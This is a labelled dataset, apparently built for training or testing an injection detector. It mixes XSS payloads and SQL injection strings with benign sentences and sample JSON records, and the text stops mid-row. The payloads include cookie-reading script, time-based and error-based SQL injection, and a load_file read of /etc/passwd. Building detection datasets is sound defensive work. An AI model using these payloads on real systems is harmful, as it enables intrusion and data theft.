%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>,1,XSS,25 "1' or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15904 One needs to select all atoms in the cage - these will be the vertices of the final polyhedron.,3,normal,25829 ";;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//;;alert(String.fromCharCode(88,83,83))//\"";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;"";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;",1,XSS,78 "1"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""urqg"" = ""urqg",2,SQLi,11076 "1"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""fqap"" like ""fqap",2,SQLi,16966 "<style>:target {transform: rotate(180deg);}</style><noscript id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></noscript>",1,XSS,542 1' ) ) as xkiq where 9008 = 9008 and sleep ( 5 ) --,2,SQLi,18387 "<figcaption oncopy=""alert(1)"" contenteditable>test</figcaption>",1,XSS,3048 <caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus>,1,XSS,2038 <noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript>,1,XSS,3067 "( updatexml ( 8862,concat ( 0x2e,0x7171706a71, ( select ( elt ( 8862 = 8862,1 ) ) ) ,0x717a767a71 ) ,8981 ) )",2,SQLi,13688 "-4347' union all select 6074,6074,6074,6074,6074,6074,6074--",2,SQLi,17147 "-5891 union all select 7103,7103,7103,7103--",2,SQLi,19082 <textarea onpointermove=alert(1)>XSS</textarea>,1,XSS,6111 1 exec sp_ ( or exec xp_ ),2,SQLi,20955 <source onpointermove=alert(1)>XSS</source>,1,XSS,7101 <slot id=x tabindex=1 onfocus=alert(1)></slot>,1,XSS,6377 "<xmp oncontextmenu=""alert(1)"">test</xmp>",1,XSS,7874 "<label onmouseup=""alert(1)"">test</label>",1,XSS,7983 "1' or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13739 I want to select a class to enroll in.,3,normal,23946 "<hgroup onmousedown=""alert(1)"">test</hgroup>",1,XSS,6930 "<div draggable=""true"" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp>",1,XSS,1043 "select * from users where id = 1 -@<@ union select 1,version ( ) -- 1",2,SQLi,16260 From the mass of material comprised in the Koran - and the account we have given is far from exhaustive - we should select the histories of the ancient prophets and saints Narratives.,3,normal,26163 Select alternate.,3,normal,24762 <svg/onload=alert(/INJECTX/)>,1,XSS,9608 <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>,1,XSS,116 <command onpointerout=alert(1)>XSS</command>,1,XSS,6994 [a](javascript:this;alert(1&#41;),1,XSS,9393 "<center onkeyup=""alert(1)"" contenteditable>test</center>",1,XSS,4252 <ul id=x tabindex=1 onfocus=alert(1)></ul>,1,XSS,7553 "<title onclick=""alert(1)"">test</title>",1,XSS,8425 "1"" ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""dppw"" like ""dppw",2,SQLi,12620 "<;STYLE>;.XSS{background-image:url("";javascript:alert(';XSS';)"";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;",1,XSS,1503 Modify the style.,3,normal,22884 1 where 8393 = 8393,2,SQLi,21944 "<picture onkeyup=""alert(1)"" contenteditable>test</picture>",1,XSS,3855 "1' where 5801 = 5801 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,10766 <cite id=x tabindex=1 onactivate=alert(1)></cite>,1,XSS,5815 Sort files.,3,normal,23077 "No bishop or archdeacon "" shall any longer hold pleas in the Hundred concerning episcopal law nor draw a cause which concerns the rule of such to the judgment of men of the world "" (Stubbs, Select Charters, part iii.).",3,normal,25871 "exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>",1,XSS,1760 Where in the database?,3,normal,23451 "<details oncut=""alert(1)"" contenteditable>test</details>",1,XSS,4312 "<style onmouseout=""alert(1)"">test</style>",1,XSS,7647 "Ungar did not ""select a sample"" of his data to analyze.",3,normal,25228 "1"" and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )",2,SQLi,10919 "<style draggable=""true"" ondragleave=""alert(1)"">test</style>",1,XSS,3682 1'|| ( select 'glec' from dual where 4846 = 4846,2,SQLi,18686 "1' ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 'ygfv' = 'ygfv",2,SQLi,12730 Select register.,3,normal,24637 "1"" ) union all select null,null,null--",2,SQLi,19783 <frameset onload=javascript:javascript:alert(1)></frameset>,1,XSS,3600 1 ) ) as smtf where 5829 = 5829,2,SQLi,20484 "1"" ) ) as yuqr where 7226 = 7226 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,14799 "<style>@keyframes x{}</style><script style=""animation-name:x"" onanimationstart=""alert(1)""></script>",1,XSS,1482 "1 ) where 6954 = 6954 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,15524 "-2583"" ) where 3455 = 3455 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,16954 <image2 onpointerout=alert(1)>XSS</image2>,1,XSS,7413 "<style>@keyframes x{}</style><basefont style=""animation-name:x"" onanimationend=""alert(1)""></basefont>",1,XSS,1408 "1"" ) where 6072 = 6072 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15560 "-6945' union all select 5063,5063,5063,5063,5063,5063,5063,5063--",2,SQLi,16696 "-8308"" ) union all select 3084,3084,3084,3084,3084,3084,3084,3084,3084#",2,SQLi,16102 <img src=``&NewLine; onerror=alert(1)&NewLine;,1,XSS,6280 "javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\"";alert()//"";alert()//';alert()//<script>alert()</script><frame src=""javascript:alert()"">` alert()//<svg/onload=alert()>*/alert()/*",1,XSS,83 declare @s varchar ( 22 ) select @s =,2,SQLi,19799 OR x=x--,2,SQLi,22499 \u003c,1,XSS,9872 "<isindex onmousedown=""alert(1)"">test</isindex>",1,XSS,6321 "1' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'luoj' = 'luoj",2,SQLi,11935 "1 ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,13477 "end and ""mdje"" like ""mdje",2,SQLi,21071 "-4045 union all select 6857,6857,6857,6857,6857,6857,6857--",2,SQLi,17249 "1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and 'rupq' = 'rupq",2,SQLi,13317 "{""id"":null,""firstName"":""Violet"",""lastName"":""Goh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27439 "1' ) and make_set ( 8403 = 8403,8899 ) and ( 'ojag' = 'ojag",2,SQLi,17242 "-2254' ) as dyrv where 9079 = 9079 union all select 9079,9079,9079,9079,9079,9079,9079,9079#",2,SQLi,14593 "1 ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( 3814 = 3814",2,SQLi,13104 "{""id"":null,""firstName"":""James"",""lastName"":""Tan"",""address"":""101 CHESAPEAKE BLVD, ELKTON MD 21921"",""city"":""359"",""telephone"":""3978317726""}",3,normal,26867 "1"" ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16884 "1', ( select ( case when ( 5141 = 5141 ) then ( ascii ( regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ) else 5141/ ( select 0 from ( values ( 0 ) ) ) end ) from ( values ( 0 ) ) )",2,SQLi,10820 "<style>@keyframes x{}</style><b style=""animation-name:x"" onanimationstart=""alert(1)""></b>",1,XSS,1782 "1' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 'xwsb' = 'xwsb",2,SQLi,17144 "To check that the SQL transact statement really is working, let us check the customer table before and after the INSERT... SELECT.",3,normal,25283 "1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""buwe"" = ""buwe",2,SQLi,12518 >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>,1,XSS,3824 1' ) ) as ypgz where 8704 = 8704,2,SQLi,20260 -3937 ) ) or 3038 = 3038,2,SQLi,21227 1' ) as gdie where 8133 = 8133 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,14102 "In 1845 he was appointed select preacher, and published in 1847 a volume of Sermons and Essays on the Apostolic Age, which not only laid the foundation of his fame as a preacher, but also marked his future position as a theologian.",3,normal,26026 <s onpointerout=alert(1)>XSS</s>,1,XSS,9446 There is simply no point in dividing the spoils among a select few whilst hoping that a few billion onlookers will not notice.,3,normal,25334 "1%"" ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ""%"" = """,2,SQLi,11268 %253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E,1,XSS,5839 "and (select substring(@@version,2,1))='y'",2,SQLi,19326 "So, again, this might be for a select few of you.",3,normal,25541 "Everett was a member of nearly all the most important select committees, such as those on the Indian relations of the state of Georgia, the Apportionment Bill, and the Bank of the United States, and drew the report either of the majority or the minority.",3,normal,26213 Where do you want it?,3,normal,23442 1 ) as bozx where 2160 = 2160 and sleep ( 5 ) #,2,SQLi,18889 1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'lnte' = 'lnte,2,SQLi,10271 "<nav draggable=""true"" ondragend=""alert(1)"">test</nav>",1,XSS,5046 "1 where 2146 = 2146 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14370 -9622' ) ) ) order by 1#,2,SQLi,21198 "<fieldset oncut=""alert(1)"" contenteditable>test</fieldset>",1,XSS,3840 Update the calendar events.,3,normal,22612 "1"" ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ""lxfm"" = ""lxfm",2,SQLi,10520 <font id=x tabindex=1 onfocus=alert(1)></font>,1,XSS,6353 <ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus>,1,XSS,3233 "<style>:target {transform: rotate(180deg);}</style><iframe id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></iframe>",1,XSS,590 "1', ( select ( case when ( 5217 = 5217 ) then 1 else 5217* ( select 5217 from mysql.db ) end ) )",2,SQLi,14364 Delete outdated files from the directory.,3,normal,22901 "-5571' union all select 8846,8846,8846,8846,8846,8846,8846#",2,SQLi,17322 "1' ) as bvvl where 9818 = 9818 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10943 "The crucial verb in SQL--Structured Query Language--is ""select."" select statements return row sets from tables, cursors, joins, or the row sets returned by other select statements.",3,normal,25467 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--",2,SQLi,13521 "-6632 ) union all select 4073,4073,4073,4073,4073,4073,4073,4073--",2,SQLi,16578 -1587' ) or 8339 = 5540,2,SQLi,21320 "<SCRIPT/SRC=""http://google.com""></SCRIPT>",1,XSS,7793 <image src=validimage.png onloadstart=alert(1)>,1,XSS,6171 "<style>:target {transform: rotate(180deg);}</style><embed id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></embed>",1,XSS,609 "select * from users where id = '1' union select "";""_,version ( ) -- 1'",2,SQLi,16147 Where did you find that serene retreat?,3,normal,23941 1%' ) ) or sleep ( 5 ) and ( ( '%' = ',2,SQLi,19737 "-7746' ) union all select 1998,1998,1998,1998,1998,1998,1998,1998#",2,SQLi,16592 Where's the counseling office?,3,normal,23625 "1 ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 3343 = 3343",2,SQLi,10394 "[<blockquote cite=""]"">["" onmouseover=""alert('RVRSH3LL_XSS');"" ]",1,XSS,2986 "<script draggable=""true"" ondragleave=""alert(1)"">test</script>",1,XSS,3281 <dl onpointermove=alert(1)>XSS</dl>,1,XSS,9069 "<progress onbeforecopy=""alert(1)"" contenteditable>test</progress>",1,XSS,2817 "1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100 ) ) ) ,1,1,1;",2,SQLi,15391 1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( 'ifvz' like 'ifvz,2,SQLi,15635 Where's the estate?,3,normal,23575 select ( case when ( 5847 = 2826 ) then 5847 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13643 <style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus>,1,XSS,2651 <custom tags onpointerdown=alert(1)>XSS</custom tags>,1,XSS,4925 "1' ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( 'cysu' like 'cysu",2,SQLi,13042 Use these evaluation techniques to select the perfect computer game for your toddler.,3,normal,25200 "1"" ) ) as klie where 2840 = 2840 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,14906 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( 'hmsu' = 'hmsu",2,SQLi,13126 "><script>alert(1337)</script>><script>alert(""XSS by \nxss</h1></marquee>",1,XSS,2349 <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>,1,XSS,756 "-1722' union all select 1408,1408,1408#",2,SQLi,19633 "1%' ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11672 "1' and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,16082 1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = 4200#,2,SQLi,17766 <progress onpointerup=alert(1)>XSS</progress>,1,XSS,6638 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) +'",2,SQLi,14318 "<hr onmouseleave=""alert(1)"">test</hr>",1,XSS,8724 <caption onpointermove=alert(1)>XSS</caption>,1,XSS,6711 "{""id"":null,""name"":""Greenland Dog""}",3,normal,27082 "<style>@keyframes x{}</style><listing style=""animation-name:x"" onanimationstart=""alert(1)""></listing>",1,XSS,1416 "-7514%"" ) ) ) or 2448 = 8797#",2,SQLi,20763 "{""id"":null,""firstName"":""Marziah"",""lastName"":""Mokhtar"",""address"":""203 SOUTH WALNUT ST, FLORENCE AL 35630"",""city"":""79"",""telephone"":""2596844752""}",3,normal,26884 <svg><image href=1 onerror=alert(1)>,1,XSS,8863 "-1512 union all select 9013,9013,9013,9013#",2,SQLi,19192 "<picture onmouseleave=""alert(1)"">test</picture>",1,XSS,6159 "<listing draggable=""true"" ondragleave=""alert(1)"">test</listing>",1,XSS,3035 Select your car.,3,normal,24830 "<tbody draggable=""true"" ondragleave=""alert(1)"">test</tbody>",1,XSS,3630 "<a href=""\x18javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2424 "<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>",1,XSS,5291 "-1256' in boolean mode ) union all select 7889,7889,7889,7889,7889,7889,7889,7889,7889--",2,SQLi,14797 "<fieldset oncontextmenu=""alert(1)"">test</fieldset>",1,XSS,5558 "<style>@keyframes x{}</style><menuitem style=""animation-name:x"" onanimationstart=""alert(1)""></menuitem>",1,XSS,1350 "1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'kwhs' like 'kwhs",2,SQLi,11990 <xmp onpointerenter=alert(1)>XSS</xmp>,1,XSS,8498 `'><script>\x0Ajavascript:alert(1)</script>,1,XSS,7066 1%' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( '%' = ',2,SQLi,10484 "1%"" ) ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15378 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--",2,SQLi,9899 "1'|| ( select 'bccx' where 5881 = 5881 and elt ( 1210 = 1210,sleep ( 5 ) ) ) ||'",2,SQLi,15229 Select your idea.,3,normal,24851 "1%"" ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12050 Select pause.,3,normal,24592 "<figcaption onclick=""alert(1)"">test</figcaption>",1,XSS,5898 "!--"" /><script>alert('xss');</script>",1,XSS,8565 "To select an avatar from the gallery, click Show Gallery.",3,normal,25250 "<style>@keyframes x{}</style><cite style=""animation-name:x"" onanimationstart=""alert(1)""></cite>",1,XSS,1620 "1' and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,19719 "<bdi onmouseover=""alert(1)"">test</bdi>",1,XSS,8474 <button onControlSelect=javascript:alert(1)>,1,XSS,7048 "<menuitem onbeforecut=""alert(1)"" contenteditable>test</menuitem>",1,XSS,2926 "<img usemap=#x><map name=""x""><area href onfocus=alert(1) id=x>",1,XSS,3208 Select the best candidate for the role.,3,normal,24137 "<meta onbeforecut=""alert(1)"" contenteditable>test</meta>",1,XSS,4276 "<style>@keyframes x{}</style><textarea style=""animation-name:x"" onanimationend=""alert(1)""></textarea>",1,XSS,1389 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( ""ekbq"" = ""ekbq",2,SQLi,13616 "1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13412 "{""id"":null,""name"":""mice everything wall""}",3,normal,27599 select ( case when ( 4666 = 4666 ) then 1 else 4666* ( select 4666 from master..sysdatabases ) end ) --,2,SQLi,13939 -8069' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 'qbvz' = 'qbvz,2,SQLi,10435 "The lowest amount I could select was $150, the largest $3,000.",3,normal,25418 "<bdo onmouseleave=""alert(1)"">test</bdo>",1,XSS,8286 <select onchange=alert(1)><option>change me</option><option>XSS</option></select>,1,XSS,1952 "<embed draggable=""true"" ondrag=""alert(1)"">test</embed>",1,XSS,4831 "1"" ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ""qycx"" like ""qycx",2,SQLi,10952 "; if not ( substring ( ( select @@version ) ,24,1 ) <> 1 ) waitfor delay '0:0:2' --",2,SQLi,15011 "1"" ) waitfor delay '0:0:5'--",2,SQLi,20837 "1"" where 9901 = 9901 and ( 2455 = 8499 ) *8499--",2,SQLi,18736 1' ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,17173 "<style>:target {color: red;}</style><bdo id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></bdo>",1,XSS,1070 "<track onbeforecopy=""alert(1)"" contenteditable>test</track>",1,XSS,3662 <hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus>,1,XSS,2579 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#",2,SQLi,17560 "-6965' ) union all select 2857,2857,2857,2857,2857,2857,2857,2857,2857,2857--",2,SQLi,15455 <svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus>,1,XSS,2472 <noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus>,1,XSS,2276 "1"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""ilrk"" = ""ilrk",2,SQLi,11183 Select the right words for the message.,3,normal,24089 "1"" ) where 3393 = 3393 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12962 "1%' ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( '%' = '",2,SQLi,12865 "1%"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""%"" = """,2,SQLi,14969 "1' ) ) as uvxv where 6663 = 6663 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12469 "<style>:target {color: red;}</style><s id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></s>",1,XSS,1267 "1' ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'ijyi' = 'ijyi",2,SQLi,12410 "<legend onmouseleave=""alert(1)"">test</legend>",1,XSS,6612 "1' ) where 1027 = 1027 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10982 "<data onmouseover=""alert(1)"">test</data>",1,XSS,7867 "<optgroup draggable=""true"" ondragenter=""alert(1)"">test</optgroup>",1,XSS,2847 <basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont>,1,XSS,3040 You can select anywhere from five minutes to an hour.,3,normal,25086 1 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,18373 "ORDER BY 1,SLEEP(5),3,4#",2,SQLi,21174 "1'+ ( select ounb where 4653 = 4653 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) +'",2,SQLi,11722 -7293' ) ) ) or 3038 = 3038,2,SQLi,20882 <IMG SRC='javascript:alert('XSS');'>,1,XSS,8777 "{""id"":null,""firstName"":""Kenneth"",""lastName"":""Chia"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27465 Plant some tall trees.,3,normal,22678 Select any color.,3,normal,24797 "<blink oncopy=""alert(1)"" contenteditable>test</blink>",1,XSS,5034 Diane Black is a member of the Planned Parenthood select committee.,3,normal,26244 "<style>@keyframes slidein {}</style><shadow style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></shadow>",1,XSS,349 "1"" ) ) as wugz where 5355 = 5355 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,14841 -9875' ) or ( 8459 = 8459 ) *4906 and ( 'mrxw' = 'mrxw,2,SQLi,18035 <link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus>,1,XSS,2262 "1%' ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( '%' = '",2,SQLi,12732 “><<script>alert(document.cookie);//<</script>,1,XSS,6279 "-7006' where 6966 = 6966 union all select 6966,6966,6966,6966#",2,SQLi,16962 <center onpointerdown=alert(1)>XSS</center>,1,XSS,7094 Select a book.,3,normal,24806 I want to choose a game for family game night.,3,normal,23882 ) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,18814 "=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z",2,SQLi,9923 "<h1 draggable=""true"" ondrag=""alert(1)"">test</h1>",1,XSS,5882 <bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi>,1,XSS,4954 "<IMG SRC=""javascript:alert('XSS');"">",1,XSS,8765 "<div draggable=""true"" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q>",1,XSS,1479 "UNION ALL SELECT 1,2,3,4,5,6--",2,SQLi,20511 "<bdi onmousemove=""alert(1)"">test</bdi>",1,XSS,8375 <button onChange=javascript:alert(1)>,1,XSS,8747 Where's the perfect spot for a scenic drive?,3,normal,23743 end and ( 'rlux' like 'rlux,2,SQLi,20876 "<dl ondblclick=""alert(1)"">test</dl>",1,XSS,9032 "1 ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( 8189 = 8189",2,SQLi,15511 "1'|| ( select 'dpje' where 2704 = 2704 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11043 "<blink onmouseenter=""alert(1)"">test</blink>",1,XSS,7251 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dfn>",1,XSS,257 Select your aspiration.,3,normal,24938 "1%' or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12128 <legend onpointerover=alert(1)>XSS</legend>,1,XSS,7286 "1%"" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ""%"" = """,2,SQLi,12994 "-8294%' union all select 8728,8728,8728,8728,8728,8728,8728,8728,8728,8728#",2,SQLi,15655 "<div draggable=""true"" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td>",1,XSS,1423 "1, ( select ( case when ( 6750 = 6750 ) then 1 else 6750* ( select 6750 from information_schema.character_sets ) end ) )",2,SQLi,13132 "{""id"":null,""firstName"":""Chua"",""lastName"":""Wee Hao"",""address"":""3555 SOUTHERN HILLS DR, SIOUX CITY IA 51106"",""city"":""595"",""telephone"":""1354695018""}",3,normal,27426 <code id=x tabindex=1 onbeforeactivate=alert(1)></code>,1,XSS,4515 "-7868"" ) ) or 9323 = 9323#",2,SQLi,20956 "1"" ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ""jebr"" like ""jebr",2,SQLi,10847 "<div id=""92""><div style=""background:url(http://foo.f/f oo/;color:red/*/foo.jpg);"">X</div>//[""'`-->]]>]</div><div id=""93""><div 